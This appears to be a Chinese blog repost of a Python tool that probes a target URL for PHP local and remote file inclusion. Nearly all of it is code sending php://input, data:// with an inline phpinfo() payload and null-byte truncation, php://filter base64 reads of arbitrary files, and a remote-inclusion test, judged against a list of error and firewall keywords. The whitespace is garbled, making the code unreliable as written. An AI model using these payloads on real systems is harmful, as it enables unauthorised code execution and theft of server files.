python 漏洞扫描工具_python打造文件包含漏洞检测工具

87 阅读 0 评论 58 点赞

我是靠谱客的博主洁净哑铃，最近开发中收集的这篇文章主要介绍python 漏洞扫描工具_python打造文件包含漏洞检测工具，觉得挺不错的，现在分享给大家，希望可以做个参考。

概述

importrequestsimportthreadingimportosimporttimeimportsys

cookies={}

urls=input('Please enter the target:')

user=input('Enter the file you want to read:')

user2=input('Enter your cookie:')for lie in user2.split(';'):

key,value=lie.split('=',1)

cookies[key]=value

payload='php://input'payload2='data:text/plain,<?php phpinfo();?>%00'payload2s='data:text/plain,<?php phpinfo();?>'payload3='php://filter/read=convert.base64-encode/resource={}'.format(user)

error=['404','Not Found','Warning','不存在','找不到','防火墙','安全狗','云锁']defexploitone(user):

headers={'user-agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'}

url=user

pocone=url+payload

poctwo=url+payload2

pocsan=url+payload3

pocsi=url+payload2s

request=requests.get(url=pocone,headers=headers,cookies=cookies)

request2=requests.get(url=poctwo,headers=headers,cookies=cookies)

request3=requests.get(url=pocsan,headers=headers,cookies=cookies)

request4=requests.get(url=pocsi,headers=headers,cookies=cookies)

ok=[]for e inerror:if request.status_code==200:if e instr(request.text):print('[-]Php://input protocol does not support')else:

ok.append('[+]Support php://input protocol Poc:{}'.format(request.url))if request2.status_code==200:if e instr(request2.text):print('[-]Data:// protocol that does not support%00 truncation')else:

ok.append('[+]Data:// protocol that supports%00 truncation Poc2:{}'.format(request2.url))if request3.status_code==200:if e instr(request3.text):print('[-]Do not support the use of php://filter/read=convert.base64-encode/resource=')else:

ok.append('[+]Support php://filter/read=convert.base64-encode/resource= Poc3:{}'.format(request3.url))if request4.status_code==200:if e instr(request4.text):print('[-]Data:// protocol does not support')else:

ok.append('[+]Support with data:// protocol Poc4:{}'.format(request4.url))if len(ok)>0:

v=list(set(ok))for vv inv:print(vv)

exploitone(urls.rstrip())defexploittwo():

poc='http://www.baidu.com'url=urls.rstrip()+poc

headers={'user-agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'}

request2=requests.get(url=url,headers=headers,cookies=cookies)

yuan=[]for e inerror:if request2.status_code==200:if e instr(request2.text):print('[-]Remote inclusion failure')else:

yuan.append('[+]Allow remote inclusion poc:{}'.format(request2.url))if len(yuan)>0:

s=list(set(yuan))for b ins:print(b)

exploittwo()